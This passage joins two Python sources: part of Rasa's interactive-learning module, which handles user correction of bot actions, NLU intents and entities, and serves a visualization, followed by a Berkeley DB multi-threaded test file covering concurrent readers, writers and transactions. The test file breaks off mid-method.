and action_name != tracker["active_form"]["name"]
and action_name != ACTION_LISTEN_NAME
)
def _form_is_restored(action_name, tracker):
"""Check whether the form is called again after it was rejected."""
return (
tracker.get("active_form", {}).get("rejected")
and tracker.get("latest_action_name") == ACTION_LISTEN_NAME
and action_name == tracker.get("active_form", {}).get("name")
)
async def _confirm_form_validation(action_name, tracker, endpoint, sender_id):
    """Ask a user whether an input for a form should be validated.

    Previous to this call, the active form was chosen after it was rejected."""
    requested_slot = tracker.get("slots", {}).get(REQUESTED_SLOT)

    validation_questions = questionary.confirm(
        "Should '{}' validate user input to fill "
        "the slot '{}'?".format(action_name, requested_slot)
    )
    validate_input = await _ask_questions(validation_questions, sender_id, endpoint)

    if not validate_input:
        # notify form action to skip validation
        await send_event(
            endpoint, sender_id, {"event": "form_validation", "validate": False}
        )

    elif not tracker.get("active_form", {}).get("validate"):
        # handle contradiction with learned behaviour
        # (training stories said "no validation", the user just said "yes")
        warning_question = questionary.confirm(
            "ERROR: FormPolicy predicted no form validation "
            "based on previous training stories. "
            "Make sure to remove contradictory stories "
            "from training data. "
            "Otherwise predicting no form validation "
            "will not work as expected."
        )

        await _ask_questions(warning_question, sender_id, endpoint)
        # notify form action to validate an input
        await send_event(
            endpoint, sender_id, {"event": "form_validation", "validate": True}
        )
async def _validate_action(
    action_name: Text,
    policy: Text,
    confidence: float,
    predictions: List[Dict[Text, Any]],
    endpoint: EndpointConfig,
    sender_id: Text,
) -> bool:
    """Query the user to validate if an action prediction is correct.

    Returns `True` if the prediction is correct, `False` otherwise."""
    question = questionary.confirm(
        "The bot wants to run '{}', correct?".format(action_name)
    )

    is_correct = await _ask_questions(question, sender_id, endpoint)

    if not is_correct:
        # Let the user pick (or create) the action that should run instead.
        action_name, is_new_action = await _request_action_from_user(
            predictions, sender_id, endpoint
        )
    else:
        is_new_action = False

    tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)

    if _form_is_rejected(action_name, tracker):
        # notify the tracker that form was rejected
        await send_event(
            endpoint,
            sender_id,
            {
                "event": "action_execution_rejected",
                "name": tracker["active_form"]["name"],
            },
        )

    elif _form_is_restored(action_name, tracker):
        await _confirm_form_validation(action_name, tracker, endpoint, sender_id)

    if not is_correct:
        await _correct_wrong_action(
            action_name, endpoint, sender_id, is_new_action=is_new_action
        )
    else:
        await send_action(endpoint, sender_id, action_name, policy, confidence)

    # The bot is done acting once `action_listen` runs (waits for user input).
    return action_name == ACTION_LISTEN_NAME
def _as_md_message(parse_data: Dict[Text, Any]) -> Text:
    """Display the parse data of a message in markdown format."""
    from rasa.nlu.training_data.formats import MarkdownWriter

    if parse_data.get("text", "").startswith(INTENT_MESSAGE_PREFIX):
        # The user already typed an intent payload (e.g. `/greet`) -- return
        # it verbatim, there is nothing to annotate.
        return parse_data["text"]

    if not parse_data.get("entities"):
        parse_data["entities"] = []

    # noinspection PyProtectedMember
    return MarkdownWriter()._generate_message_md(parse_data)
def _validate_user_regex(latest_message: Dict[Text, Any], intents: List[Text]) -> bool:
"""Validate if a users message input is correct.
This assumes the user entered an intent directly, e.g. using
`/greet`. Return `True` if the intent is a known one."""
parse_data = latest_message.get("parse_data", {})
intent = parse_data.get("intent", {}).get("name")
if intent in intents:
return True
else:
return False
async def _validate_user_text(
    latest_message: Dict[Text, Any], endpoint: EndpointConfig, sender_id: Text
) -> bool:
    """Validate a user message input as free text.

    This assumes the user message is a text message (so NOT `/greet`)."""
    parse_data = latest_message.get("parse_data", {})
    text = _as_md_message(parse_data)
    intent = parse_data.get("intent", {}).get("name")
    entities = parse_data.get("entities", [])

    # Guard clause: nothing to confirm if no intent was classified at all.
    if intent is None:
        print("The NLU classification for '{}' returned '{}'".format(text, intent))
        return False

    if entities:
        message = (
            "Is the intent '{}' correct for '{}' and are "
            "all entities labeled correctly?".format(intent, text)
        )
    else:
        message = (
            "Your NLU model classified '{}' with intent '{}'"
            " and there are no entities, is this correct?".format(text, intent)
        )

    question = questionary.confirm(message)
    return await _ask_questions(question, sender_id, endpoint)
async def _validate_nlu(
    intents: List[Text], endpoint: EndpointConfig, sender_id: Text
) -> None:
    """Validate if a user message, either text or intent is correct.

    If the prediction of the latest user message is incorrect,
    the tracker will be corrected with the correct intent / entities."""
    tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)

    latest_message = latest_user_message(tracker.get("events", [])) or {}

    if latest_message.get("text", "").startswith(  # pytype: disable=attribute-error
        INTENT_MESSAGE_PREFIX
    ):
        # Message was entered as a direct intent payload (e.g. `/greet`).
        valid = _validate_user_regex(latest_message, intents)
    else:
        valid = await _validate_user_text(latest_message, endpoint, sender_id)

    if not valid:
        corrected_intent = await _request_intent_from_user(
            latest_message, intents, sender_id, endpoint
        )
        # corrected intents have confidence 1.0
        corrected_intent["confidence"] = 1.0
        events = tracker.get("events", [])

        entities = await _correct_entities(latest_message, endpoint, sender_id)
        corrected_nlu = {
            "intent": corrected_intent,
            "entities": entities,
            "text": latest_message.get("text"),
        }

        await _correct_wrong_nlu(corrected_nlu, events, endpoint, sender_id)
async def _correct_entities(
    latest_message: Dict[Text, Any], endpoint: EndpointConfig, sender_id: Text
) -> List[Dict[Text, Any]]:
    """Validate the entities of a user message.

    Returns the corrected entities"""
    from rasa.nlu.training_data.formats import MarkdownReader

    parse_original = latest_message.get("parse_data", {})

    # Pre-fill the prompt with the current markdown annotation so the user
    # only edits what is wrong.
    question = questionary.text(
        "Please mark the entities using [value](type) notation",
        default=_as_md_message(parse_original),
    )
    annotation = await _ask_questions(question, sender_id, endpoint)

    # noinspection PyProtectedMember
    parse_annotated = MarkdownReader()._parse_training_example(annotation)

    return _merge_annotated_and_original_entities(parse_annotated, parse_original)
def _merge_annotated_and_original_entities(parse_annotated, parse_original):
    """Merge user-annotated entities with the originally parsed ones.

    Entities that were already present in the original annotation are taken
    from there, to preserve additional entity parser information."""
    original_entities = parse_original.get("entities", [])
    merged = []
    for annotated_entity in parse_annotated.get("entities", []):
        replacement = next(
            (
                original
                for original in original_entities
                if _is_same_entity_annotation(annotated_entity, original)
            ),
            annotated_entity,
        )
        merged.append(replacement)
    return merged
def _is_same_entity_annotation(entity, other):
return entity["value"] == other["value"] and entity["entity"] == other["entity"]
async def _enter_user_message(sender_id: Text, endpoint: EndpointConfig) -> None:
    """Request a new message from the user."""
    question = questionary.text("Your input ->")

    # Re-ask until the user enters something non-empty.
    message = await _ask_questions(question, sender_id, endpoint, lambda a: not a)

    restart_payload = INTENT_MESSAGE_PREFIX + constants.USER_INTENT_RESTART
    if message == restart_payload:
        raise RestartConversation()

    await send_message(endpoint, sender_id, message)
async def is_listening_for_message(sender_id: Text, endpoint: EndpointConfig) -> bool:
    """Check if the conversation is in need for a user message."""
    tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.APPLIED)

    # Walk the events backwards: the most recent user/action event decides.
    # (The original used `enumerate` but never used the index.)
    for e in reversed(tracker.get("events", [])):
        if e.get("event") == UserUttered.type_name:
            return False
        elif e.get("event") == ActionExecuted.type_name:
            return e.get("name") == ACTION_LISTEN_NAME
    return False
async def _undo_latest(sender_id: Text, endpoint: EndpointConfig) -> None:
    """Undo either the latest bot action or user message, whatever is last."""
    tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.ALL)

    # Get latest `UserUtterance` or `ActionExecuted` event; a `Restarted`
    # event bounds the search (nothing before a restart may be undone).
    # (The original used `enumerate` but never used the index, and had two
    # identical `break` branches.)
    last_event_type = None
    for e in reversed(tracker.get("events", [])):
        last_event_type = e.get("event")
        if last_event_type in {
            ActionExecuted.type_name,
            UserUttered.type_name,
            Restarted.type_name,
        }:
            break

    if last_event_type == ActionExecuted.type_name:
        undo_action = ActionReverted().as_dict()
        await send_event(endpoint, sender_id, undo_action)
    elif last_event_type == UserUttered.type_name:
        # Reverting the utterance also drops the preceding `action_listen`,
        # so replay it to keep the bot waiting for input.
        undo_user_message = UserUtteranceReverted().as_dict()
        listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()

        await send_event(
            endpoint, sender_id, [undo_user_message, listen_for_next_message]
        )
async def _fetch_events(
    sender_ids: List[Union[Text, List[Event]]], endpoint: EndpointConfig
) -> List[List[Event]]:
    """Retrieve all event trackers from the endpoint for all sender ids."""
    event_sequences = []
    for sender_id in sender_ids:
        if not isinstance(sender_id, str):
            # Already a list of events -- use it as-is.
            event_sequences.append(sender_id)
            continue

        tracker = await retrieve_tracker(endpoint, sender_id)
        serialised_events = tracker.get("events", [])

        for conversation in _split_conversation_at_restarts(serialised_events):
            event_sequences.append(rasa.core.events.deserialise_events(conversation))

    return event_sequences
async def _plot_trackers(
    sender_ids: List[Union[Text, List[Event]]],
    output_file: Optional[Text],
    endpoint: EndpointConfig,
    unconfirmed: Optional[List[Event]] = None,
):
    """Create a plot of the trackers of the passed sender ids.

    This assumes that the last sender id is the conversation we are currently
    working on. If there are events that are not part of this active tracker
    yet, they can be passed as part of `unconfirmed`. They will be appended
    to the currently active conversation."""
    if not output_file or not sender_ids:
        # if there is no output file provided, we are going to skip plotting
        # same happens if there are no sender ids
        return None

    event_sequences = await _fetch_events(sender_ids, endpoint)

    if unconfirmed:
        # Append the not-yet-confirmed events to the active conversation.
        event_sequences[-1].extend(unconfirmed)

    graph = await visualize_neighborhood(
        event_sequences[-1], event_sequences, output_file=None, max_history=2
    )

    from networkx.drawing.nx_pydot import write_dot

    write_dot(graph, output_file)
def _print_help(skip_visualization: bool) -> None:
    """Print some initial help message for the user."""
    visualization_help = ""
    if not skip_visualization:
        visualization_url = DEFAULT_SERVER_FORMAT.format(DEFAULT_SERVER_PORT + 1)
        visualization_help = "Visualisation at {}/visualization.html.".format(
            visualization_url
        )

    rasa.cli.utils.print_success(
        "Bot loaded. {}\n"
        "Type a message and press enter "
        "(press 'Ctr-c' to exit). "
        "".format(visualization_help)
    )
async def record_messages(
    endpoint: EndpointConfig,
    sender_id: Text = UserMessage.DEFAULT_SENDER_ID,
    max_message_limit: Optional[int] = None,
    stories: Optional[Text] = None,
    skip_visualization: bool = False,
):
    """Read messages from the command line and print bot responses."""
    from rasa.core import training

    try:
        _print_help(skip_visualization)

        try:
            domain = await retrieve_domain(endpoint)
        except ClientError:
            logger.exception(
                "Failed to connect to Rasa Core server at '{}'. "
                "Is the server running?".format(endpoint.url)
            )
            return

        # Load the existing training stories so they can be plotted next to
        # the live conversation.
        trackers = await training.load_data(
            stories,
            Domain.from_dict(domain),
            augmentation_factor=0,
            use_story_concatenation=False,
        )

        intents = [next(iter(i)) for i in (domain.get("intents") or [])]

        num_messages = 0
        # Last entry is the active conversation; see `_plot_trackers`.
        sender_ids = [t.events for t in trackers] + [sender_id]

        if not skip_visualization:
            plot_file = "story_graph.dot"
            await _plot_trackers(sender_ids, plot_file, endpoint)
        else:
            plot_file = None

        while not utils.is_limit_reached(num_messages, max_message_limit):
            try:
                if await is_listening_for_message(sender_id, endpoint):
                    await _enter_user_message(sender_id, endpoint)
                    await _validate_nlu(intents, endpoint, sender_id)
                await _predict_till_next_listen(
                    endpoint, sender_id, sender_ids, plot_file
                )

                num_messages += 1
            # The following exceptions implement the menu actions of
            # `_ask_if_quit` as control flow.
            except RestartConversation:
                await send_event(endpoint, sender_id, Restarted().as_dict())

                await send_event(
                    endpoint, sender_id, ActionExecuted(ACTION_LISTEN_NAME).as_dict()
                )

                logger.info("Restarted conversation, starting a new one.")
            except UndoLastStep:
                await _undo_latest(sender_id, endpoint)
                await _print_history(sender_id, endpoint)
            except ForkTracker:
                await _print_history(sender_id, endpoint)

                events_fork = await _request_fork_from_user(sender_id, endpoint)

                await send_event(endpoint, sender_id, Restarted().as_dict())

                if events_fork:
                    for evt in events_fork:
                        await send_event(endpoint, sender_id, evt)
                logger.info("Restarted conversation at fork.")

                await _print_history(sender_id, endpoint)
                await _plot_trackers(sender_ids, plot_file, endpoint)

    except Abort:
        return
    except Exception:
        logger.exception("An exception occurred while recording messages.")
        raise
def _serve_application(app, stories, skip_visualization):
    """Start a core server and attach the interactive learning IO."""
    endpoint = EndpointConfig(url=DEFAULT_SERVER_URL)

    async def run_interactive_io(running_app: Sanic):
        """Small wrapper to shut down the server once cmd io is done."""
        await record_messages(
            endpoint=endpoint,
            stories=stories,
            skip_visualization=skip_visualization,
            sender_id=uuid.uuid4().hex,
        )

        logger.info("Killing Sanic server now.")

        running_app.stop()  # kill the sanic server

    # Run the interactive session as a background task of the Sanic app so
    # server and command-line IO share the same event loop.
    app.add_task(run_interactive_io)

    update_sanic_log_level()

    # Blocks until `running_app.stop()` is called above.
    app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT)

    return app
def start_visualization(image_path: Text = None) -> None:
    """Add routes to serve the conversation visualization files."""
    app = Sanic(__name__)

    # noinspection PyUnusedLocal
    @app.exception(NotFound)
    async def ignore_404s(request, exception):
        # Keep missing-asset requests quiet with a plain 404.
        return response.text("Not found", status=404)

    # noinspection PyUnusedLocal
    @app.route(VISUALIZATION_TEMPLATE_PATH, methods=["GET"])
    def visualisation_html(request):
        return response.file(visualization.visualization_html_path())

    # noinspection PyUnusedLocal
    @app.route("/visualization.dot", methods=["GET"])
    def visualisation_png(request):
        try:
            # the graph file is updated externally, so we should not cache it
            headers = {"Cache-Control": "no-cache"}
            return response.file(os.path.abspath(image_path), headers=headers)
        except FileNotFoundError:
            return response.text("", 404)

    update_sanic_log_level()

    # Visualization is served one port above the main server; blocks forever.
    app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT + 1, access_log=False)
# noinspection PyUnusedLocal
async def train_agent_on_start(args, endpoints, additional_arguments, app, loop):
    """Train an agent from CLI args and attach it to the Sanic app.

    Sanic "before_server_start" listener signature: `app` and `loop` are
    supplied by Sanic; the first three parameters are bound via `partial`.
    """
    _interpreter = NaturalLanguageInterpreter.create(args.get("nlu"), endpoints.nlu)

    # Train into `out` if given, otherwise into a temporary model directory.
    model_directory = args.get("out", tempfile.mkdtemp(suffix="_core_model"))

    _agent = await train(
        args.get("domain"),
        args.get("stories"),
        model_directory,
        _interpreter,
        endpoints,
        args.get("dump_stories"),
        args.get("config")[0],
        None,
        additional_arguments,
    )
    app.agent = _agent
async def wait_til_server_is_running(endpoint, max_retries=30, sleep_between_retries=1):
    """Try to reach the server, retry a couple of times and sleep in between."""
    while max_retries:
        try:
            status = await retrieve_status(endpoint)
            logger.info("Reached core: {}".format(status))
            if status.get("is_ready"):
                # server is ready to go
                return True
            # server did not finish loading the agent yet
            # in this case, we need to wait till the model trained
            # so we might be sleeping for a while...
            await asyncio.sleep(sleep_between_retries)
        except ClientError:
            # Connection failures are the only thing that consumes a retry.
            max_retries -= 1
            if max_retries:
                await asyncio.sleep(sleep_between_retries)

    return False
def run_interactive_learning(
    stories: Text = None,
    skip_visualization: bool = False,
    server_args: Dict[Text, Any] = None,
    additional_arguments: Dict[Text, Any] = None,
):
    """Start the interactive learning with the model of the agent."""
    server_args = server_args or {}

    # CLI-provided paths override the default export locations.
    if server_args.get("nlu_data"):
        PATHS["nlu"] = server_args["nlu_data"]

    if server_args.get("stories"):
        PATHS["stories"] = server_args["stories"]

    if server_args.get("domain"):
        PATHS["domain"] = server_args["domain"]

    if not skip_visualization:
        # Serve the story graph from a separate process so plotting does not
        # block the interactive session.
        p = Process(target=start_visualization, args=("story_graph.dot",))
        p.daemon = True
        p.start()
    else:
        p = None

    app = run.configure_app(enable_api=True)
    endpoints = AvailableEndpoints.read_endpoints(server_args.get("endpoints"))

    # before_server_start handlers make sure the agent is loaded before the
    # interactive learning IO starts
    if server_args.get("model"):
        app.register_listener(
            partial(run.load_agent_on_start, server_args.get("model"), endpoints, None),
            "before_server_start",
        )
    else:
        app.register_listener(
            partial(train_agent_on_start, server_args, endpoints, additional_arguments),
            "before_server_start",
        )

    # Blocks until the interactive session ends.
    _serve_application(app, stories, skip_visualization)

    if not skip_visualization and p is not None:
        p.terminate()
        p.join()
|
test_thread.py
|
"""
Copyright (c) 2008-2017, Jesus Cea Avion <jcea@jcea.es>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
3. Neither the name of Jesus Cea Avion nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
"""
"""TestCases for multi-threaded access to a DB.
"""
import os
import sys
import time
import errno
from random import random
# Separator used by `makeData` to build verifiable record values.
DASH = '-'

# `WindowsError` only exists as a builtin on Windows; define a stand-in on
# other platforms so `except WindowsError` clauses still work.
try:
    WindowsError
except NameError:
    class WindowsError(Exception):
        pass

import unittest
from .test_all import db, dbutils, test_support, verbose, have_threads, \
        get_new_environment_path, get_new_database_path

if have_threads :
    from threading import Thread
    # Python 2 spells it `currentThread`; alias the Python 3 name to match.
    if sys.version_info[0] < 3 :
        from threading import currentThread
    else :
        from threading import current_thread as currentThread
#----------------------------------------------------------------------
class BaseThreadedTestCase(unittest.TestCase):
    """Common DBEnv/DB setup shared by the threaded Berkeley DB test cases."""

    dbtype       = db.DB_UNKNOWN  # must be set in derived class
    dbopenflags  = 0
    dbsetflags   = 0
    envflags     = 0

    def setUp(self):
        """Create a fresh environment and open a DB of the configured type."""
        if verbose:
            dbutils._deadlock_VerboseFile = sys.stdout

        self.homeDir = get_new_environment_path()
        self.env = db.DBEnv()
        self.setEnvOpts()
        self.env.open(self.homeDir, self.envflags | db.DB_CREATE)

        self.filename = self.__class__.__name__ + '.db'
        self.d = db.DB(self.env)
        if self.dbsetflags:
            self.d.set_flags(self.dbsetflags)
        self.d.open(self.filename, self.dbtype, self.dbopenflags|db.DB_CREATE)

    def tearDown(self):
        """Close DB and environment handles and remove the on-disk env."""
        self.d.close()
        self.env.close()
        test_support.rmtree(self.homeDir)

    def setEnvOpts(self):
        # Hook for subclasses to configure the DBEnv before it is opened.
        pass

    def makeData(self, key):
        # Deterministic value derived from the key so readers can verify it.
        return DASH.join([key] * 5)
#----------------------------------------------------------------------
class ConcurrentDataStoreBase(BaseThreadedTestCase):
    """Exercise Berkeley DB "Concurrent Data Store" mode: several writer
    threads fill the database while each writer releases its share of reader
    threads as records become available."""

    dbopenflags = db.DB_THREAD
    envflags    = db.DB_THREAD | db.DB_INIT_CDB | db.DB_INIT_MPOOL
    readers     = 0  # derived class should set
    writers     = 0
    records     = 1000

    def test01_1WriterMultiReaders(self):
        if verbose:
            print('\n', '-=' * 30)
            print("Running %s.test01_1WriterMultiReaders..." % \
                  self.__class__.__name__)

        keys=list(range(self.records))
        import random
        random.shuffle(keys)
        records_per_writer=self.records//self.writers
        readers_per_writer=self.readers//self.writers
        # The workload must divide evenly, otherwise records or readers
        # would be silently dropped below.
        self.assertEqual(self.records,self.writers*records_per_writer)
        self.assertEqual(self.readers,self.writers*readers_per_writer)
        self.assertTrue((records_per_writer%readers_per_writer)==0)
        readers = []

        for x in range(self.readers):
            rt = Thread(target = self.readerThread,
                        args = (self.d, x),
                        name = 'reader %d' % x,
                        )#verbose = verbose)
            if sys.version_info[0] < 3 :
                rt.setDaemon(True)
            else :
                rt.daemon = True
            readers.append(rt)

        writers=[]
        for x in range(self.writers):
            a=keys[records_per_writer*x:records_per_writer*(x+1)]
            a.sort()  # Generate conflicts
            b=readers[readers_per_writer*x:readers_per_writer*(x+1)]
            wt = Thread(target = self.writerThread,
                        args = (self.d, a, b),
                        name = 'writer %d' % x,
                        )#verbose = verbose)
            writers.append(wt)

        for t in writers:
            if sys.version_info[0] < 3 :
                t.setDaemon(True)
            else :
                t.daemon = True
            t.start()

        for t in writers:
            t.join()
        for t in readers:
            t.join()

    def writerThread(self, d, keys, readers):
        if sys.version_info[0] < 3 :
            name = currentThread().getName()
        else :
            name = currentThread().name

        if verbose:
            # BUGFIX: this print referenced undefined names `start`/`stop`
            # (NameError whenever verbose was enabled). `keys` is sorted by
            # the caller, so its first/last elements bound the range.
            print("%s: creating records %d - %d" % (name, keys[0], keys[-1]))

        count=len(keys)//len(readers)
        count2=count
        for x in keys :
            key = '%04d' % x
            dbutils.DeadlockWrap(d.put, key, self.makeData(key),
                                 max_retries=12)
            if verbose and x % 100 == 0:
                # BUGFIX: `start` was undefined here as well.
                print("%s: records %d - %d finished" % (name, keys[0], x))

            # Every `count` records, release one of this writer's readers.
            count2-=1
            if not count2 :
                readers.pop().start()
                count2=count

        if verbose:
            print("%s: finished creating records" % name)

        if verbose:
            print("%s: thread finished" % name)

    def readerThread(self, d, readerNum):
        if sys.version_info[0] < 3 :
            name = currentThread().getName()
        else :
            name = currentThread().name

        for i in range(5) :
            c = d.cursor()
            count = 0
            rec = c.first()
            while rec:
                count += 1
                key, data = rec
                self.assertEqual(self.makeData(key), data)
                # NOTE(review): `next(c)` requires the cursor to implement the
                # iterator protocol; bsddb3 cursors also expose `c.next()` --
                # confirm this works against the binding in use.
                rec = next(c)
            if verbose:
                print("%s: found %d records" % (name, count))
            c.close()

        if verbose:
            print("%s: thread finished" % name)
class BTreeConcurrentDataStore(ConcurrentDataStoreBase):
    """Concurrent Data Store test run against a BTree database."""
    dbtype  = db.DB_BTREE
    writers = 2
    readers = 10
    records = 1000
class HashConcurrentDataStore(ConcurrentDataStoreBase):
    """Concurrent Data Store test run against a Hash database."""
    dbtype  = db.DB_HASH
    writers = 2
    readers = 10
    records = 1000
#----------------------------------------------------------------------
class SimpleThreadedBase(BaseThreadedTestCase):
    """Threaded reads/writes against a locking (DB_INIT_LOCK) environment with
    automatic deadlock detection; cursor operations go through DeadlockWrap."""
    dbopenflags = db.DB_THREAD
    envflags = db.DB_THREAD | db.DB_INIT_MPOOL | db.DB_INIT_LOCK
    readers = 10
    writers = 2
    records = 1000
    def setEnvOpts(self):
        """Enable the environment's automatic deadlock detector."""
        self.env.set_lk_detect(db.DB_LOCK_DEFAULT)
    def test02_SimpleLocks(self):
        """Writers insert shuffled key ranges while starting their readers."""
        if verbose:
            print('\n', '-=' * 30)
            print("Running %s.test02_SimpleLocks..." % self.__class__.__name__)
        keys=list(range(self.records))
        import random
        random.shuffle(keys)
        # Split records and readers evenly among the writer threads.
        records_per_writer=self.records//self.writers
        readers_per_writer=self.readers//self.writers
        self.assertEqual(self.records,self.writers*records_per_writer)
        self.assertEqual(self.readers,self.writers*readers_per_writer)
        self.assertTrue((records_per_writer%readers_per_writer)==0)
        readers = []
        for x in range(self.readers):
            rt = Thread(target = self.readerThread,
                        args = (self.d, x),
                        name = 'reader %d' % x,
                        )#verbose = verbose)
            if sys.version_info[0] < 3 :
                rt.setDaemon(True)
            else :
                rt.daemon = True
            readers.append(rt)
        writers = []
        for x in range(self.writers):
            a=keys[records_per_writer*x:records_per_writer*(x+1)]
            a.sort()  # Generate conflicts
            b=readers[readers_per_writer*x:readers_per_writer*(x+1)]
            wt = Thread(target = self.writerThread,
                        args = (self.d, a, b),
                        name = 'writer %d' % x,
                        )#verbose = verbose)
            writers.append(wt)
        for t in writers:
            if sys.version_info[0] < 3 :
                t.setDaemon(True)
            else :
                t.daemon = True
            t.start()
        for t in writers:
            t.join()
        for t in readers:
            t.join()
    def writerThread(self, d, keys, readers):
        """Insert this writer's keys (deadlock-wrapped) and start one reader
        after every len(keys)//len(readers) inserts."""
        if sys.version_info[0] < 3 :
            name = currentThread().getName()
        else :
            name = currentThread().name
        if verbose:
            # NOTE(review): `start`/`stop` are undefined in this scope -- this
            # print raises NameError whenever verbose is enabled.
            print("%s: creating records %d - %d" % (name, start, stop))
        count=len(keys)//len(readers)
        count2=count
        for x in keys :
            key = '%04d' % x
            dbutils.DeadlockWrap(d.put, key, self.makeData(key),
                                 max_retries=12)
            if verbose and x % 100 == 0:
                print("%s: records %d - %d finished" % (name, start, x))
            count2-=1
            if not count2 :
                readers.pop().start()
                count2=count
        if verbose:
            print("%s: thread finished" % name)
    def readerThread(self, d, readerNum):
        """Scan the whole database once, validating every record's payload;
        both cursor calls are wrapped to retry on deadlock."""
        if sys.version_info[0] < 3 :
            name = currentThread().getName()
        else :
            name = currentThread().name
        c = d.cursor()
        count = 0
        rec = dbutils.DeadlockWrap(c.first, max_retries=10)
        while rec:
            count += 1
            key, data = rec
            self.assertEqual(self.makeData(key), data)
            rec = dbutils.DeadlockWrap(c.__next__, max_retries=10)
        if verbose:
            print("%s: found %d records" % (name, count))
        c.close()
        if verbose:
            print("%s: thread finished" % name)
class BTreeSimpleThreaded(SimpleThreadedBase):
    """Locking test run against a BTree database."""
    dbtype = db.DB_BTREE
class HashSimpleThreaded(SimpleThreadedBase):
    """Locking test run against a Hash database."""
    dbtype = db.DB_HASH
#----------------------------------------------------------------------
class ThreadedTransactionsBase(BaseThreadedTestCase):
    """Fully transactional (DB_INIT_TXN) threaded test. Writers commit keys in
    batches and readers scan inside transactions, both retrying on deadlock,
    while a helper thread periodically runs the lock detector."""
    dbopenflags = db.DB_THREAD | db.DB_AUTO_COMMIT
    envflags = (db.DB_THREAD |
                db.DB_INIT_MPOOL |
                db.DB_INIT_LOCK |
                db.DB_INIT_LOG |
                db.DB_INIT_TXN
                )
    readers = 0
    writers = 0
    records = 2000
    txnFlag = 0
    def setEnvOpts(self):
        """No automatic detection: deadlocks are broken by deadlockThread()."""
        #self.env.set_lk_detect(db.DB_LOCK_DEFAULT)
        pass
    def test03_ThreadedTransactions(self):
        """Run writers/readers plus the deadlock-detector thread to completion."""
        if verbose:
            print('\n', '-=' * 30)
            print("Running %s.test03_ThreadedTransactions..." % \
                  self.__class__.__name__)
        keys=list(range(self.records))
        import random
        random.shuffle(keys)
        # Split records and readers evenly among the writer threads.
        records_per_writer=self.records//self.writers
        readers_per_writer=self.readers//self.writers
        self.assertEqual(self.records,self.writers*records_per_writer)
        self.assertEqual(self.readers,self.writers*readers_per_writer)
        self.assertTrue((records_per_writer%readers_per_writer)==0)
        readers=[]
        for x in range(self.readers):
            rt = Thread(target = self.readerThread,
                        args = (self.d, x),
                        name = 'reader %d' % x,
                        )#verbose = verbose)
            if sys.version_info[0] < 3 :
                rt.setDaemon(True)
            else :
                rt.daemon = True
            readers.append(rt)
        writers = []
        for x in range(self.writers):
            a=keys[records_per_writer*x:records_per_writer*(x+1)]
            b=readers[readers_per_writer*x:readers_per_writer*(x+1)]
            wt = Thread(target = self.writerThread,
                        args = (self.d, a, b),
                        name = 'writer %d' % x,
                        )#verbose = verbose)
            writers.append(wt)
        dt = Thread(target = self.deadlockThread)
        if sys.version_info[0] < 3 :
            dt.setDaemon(True)
        else :
            dt.daemon = True
        dt.start()
        for t in writers:
            if sys.version_info[0] < 3 :
                t.setDaemon(True)
            else :
                t.daemon = True
            t.start()
        for t in writers:
            t.join()
        for t in readers:
            t.join()
        # Tell the detector loop to stop only after all workers are done.
        self.doLockDetect = False
        dt.join()
    def writerThread(self, d, keys, readers):
        """Insert keys in transactional batches, retrying the whole batch on
        deadlock; start one reader after each successful commit."""
        if sys.version_info[0] < 3 :
            name = currentThread().getName()
        else :
            name = currentThread().name
        count=len(keys)//len(readers)
        while len(keys):
            try:
                txn = self.env.txn_begin(None, self.txnFlag)
                keys2=keys[:count]
                for x in keys2 :
                    key = '%04d' % x
                    d.put(key, self.makeData(key), txn)
                    if verbose and x % 100 == 0:
                        # NOTE(review): `start` is undefined in this scope --
                        # NameError whenever verbose is enabled.
                        print("%s: records %d - %d finished" % (name, start, x))
                txn.commit()
                # Only drop the batch from `keys` after a successful commit.
                keys=keys[count:]
                readers.pop().start()
            except (db.DBLockDeadlockError, db.DBLockNotGrantedError) as val:
                if verbose:
                    print("%s: Aborting transaction (%s)" % (name,
                                                             val.args[1]))
                txn.abort()
        if verbose:
            print("%s: thread finished" % name)
    def readerThread(self, d, readerNum):
        """Cursor-scan the database inside a transaction, restarting from
        scratch whenever the transaction deadlocks."""
        if sys.version_info[0] < 3 :
            name = currentThread().getName()
        else :
            name = currentThread().name
        finished = False
        while not finished:
            try:
                txn = self.env.txn_begin(None, self.txnFlag)
                c = d.cursor(txn)
                count = 0
                rec = c.first()
                while rec:
                    count += 1
                    key, data = rec
                    self.assertEqual(self.makeData(key), data)
                    rec = next(c)
                if verbose: print("%s: found %d records" % (name, count))
                c.close()
                txn.commit()
                finished = True
            except (db.DBLockDeadlockError, db.DBLockNotGrantedError) as val:
                if verbose:
                    print("%s: Aborting transaction (%s)" % (name,
                                                             val.args[1]))
                c.close()
                txn.abort()
        if verbose:
            print("%s: thread finished" % name)
    def deadlockThread(self):
        """Poll every 50 ms, aborting a random participant of each deadlock,
        until test03 clears self.doLockDetect."""
        self.doLockDetect = True
